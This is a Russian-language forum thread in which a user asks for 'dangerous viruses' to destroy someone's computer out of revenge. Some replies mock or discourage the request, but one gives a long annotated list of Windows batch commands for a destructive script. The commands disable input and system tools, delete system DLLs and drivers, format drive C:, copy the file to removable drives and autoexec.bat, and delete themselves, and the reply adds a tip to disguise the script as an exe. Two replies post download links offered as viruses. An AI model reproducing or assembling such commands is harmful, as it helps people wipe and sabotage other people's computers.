Программное обеспечение
Срочно нужны ВИРУСЫ, где можно скачать Опасные вирусы, чтоб помп ваще нельзя было восстановить.
Месть коварная штука
Напишите сами, но помните, что эта деятельность карается законом !
если нужен вирус пиши только он не портит комп а стирает всё что на нём есть
Да начхать на твои вирусы тому, у кого голова на плечах и руки не кривые.
Берёш кувалду и комр врага, или ищи Бивирус
в текстовом докум. пишешь команды
потом сохраняешь его в формате (имя). bat
а вот команды пиши через строчку
rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
rundll32 mouse,disable – Отключаем мышь тоже на всякий.
copy 0 %windir/system – Копируемся в папку windows/system
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f – Запретить диспейчер задач
del "%SystemRoot%system32*.dll" /q – Удалить все системные DLL(Динамические загружаемые библиотеки)
del "%SystemRoot%Driver Cachei386driver.cab" /f /q – Удалить все драйверы, установленные на компьютере
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f – Делает невозможным запуск приложений
time 0:00 – Поставить время на 00:00
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f – Запретить редактирование реестра вручную
del "%SystemRoot%Cursors*.*" – Удалить курсор мыши
del "%SystemRoot%Media" /q – Удалить системные звуки Windows
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f – Запретить вызов панели кправления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f – Убрать рабочий стол
shutdown -r -t 1 -c "lol" -f – перезагрузка ПК
shutdown -s -t 1 -c "lol" -f – выключение ПК
label C:Диск – Переименовать диск С:
chcp 1251
msg * "Текст сообщения" – Показать Windows-стилизованное сообщение с кнопкой ОК
del "%0" – Самоликвидация вируса
cls – Выходим
net user "х" /add - добавит на компьютер пользователя под именем
color 40 - делаем фон файла красным, а буквы чёрными
assoc .х=.у - переделает все файлы, на компьютере, форматом х на у
C:\WINDOWS\COMMAND\format c: /autotest или Cd\ - форматирование дика С: /
Format C:\
Y
Cd\ - снос винд
Cd C:
Сd windows
cd system
del *.dll
del *.exe
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe
copy %0 Диск: run.bat - заражает диск (флэшку дескету и т. п. )
echo c:virus.bat>>c:autoexec.bat - удаляет всё кроме вируса
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм
rundll32 shell32, SHExitWindowsEx 1 - выключить ПК
rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК
rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь) . В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n.
: x ;
Start mspaint - предназначен для бесконечного запуска определённой программы ( здесь указана пайнт) .
goto x ;
rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна)
------------------------------------------------------------------------------------------------------------------------------------------------------
Кстати есть одна программа которая делает из этого файла exe и добавляет иконку, прога называется Bat To Exe Converter.
Удачи)
если это другу то не открывайне нажимай на файл если хочешь уничтожить комп то кликни два раза но для этого нужны соответствующие команды
а вот команды пиши через строчку
time 0:00 – Поставить время на 00:00
label C:Диск – Переименовать диск С:
chcp 1251
del "%0" – Самоликвидация вируса
cls – Выходим
Format C:\
Y
Cd\ - снос винд
Cd C:
Сd windows
cd system
del *.dll
del *.exe
Cd\
Cd C:
Сd winMe
Del *.exe
Del *.ini
Del *.com
Cd\
Cd win98
Cd system
Del *.dll
Del *.exe
-запрет запуска програм
: x ;
goto x ;
Удачи)
с такими вещами надо опыт. желая наврить кому то можешь кончить процессор себе
Логическая цепочка: эвм->аццкий моск->ручная сила->стена.
Идеальный выход из ситуации.. .
А вообще, для чего вам вирусы? Машина от вирусов лечится так и так.... Хм... Думаю можно оторвать проводок из "мамы" либо поцарапать процессор: D
Ломать не строить как говорится..
Идеальный выход из ситуации.. .
Ломать не строить как говорится..
А следующий вопрос про яды или про оружие будет?)
Раздолбай комп вот тебе и вирус и не восстановить уже!!
В дупле твоей бывшей
на лови вирус похуже трояна я сам его писал чтобы актевировать поменяй формат в bat отвечаю комп просто взорвется оперативка не выдержит этот вирус откроет более 1000000000 приложений в минуту вот сыллка https://yadi.sk/i/C10NnI123KPeJ9
http://bingleborp.xyz/other/virus.zip это опасный вирус!!!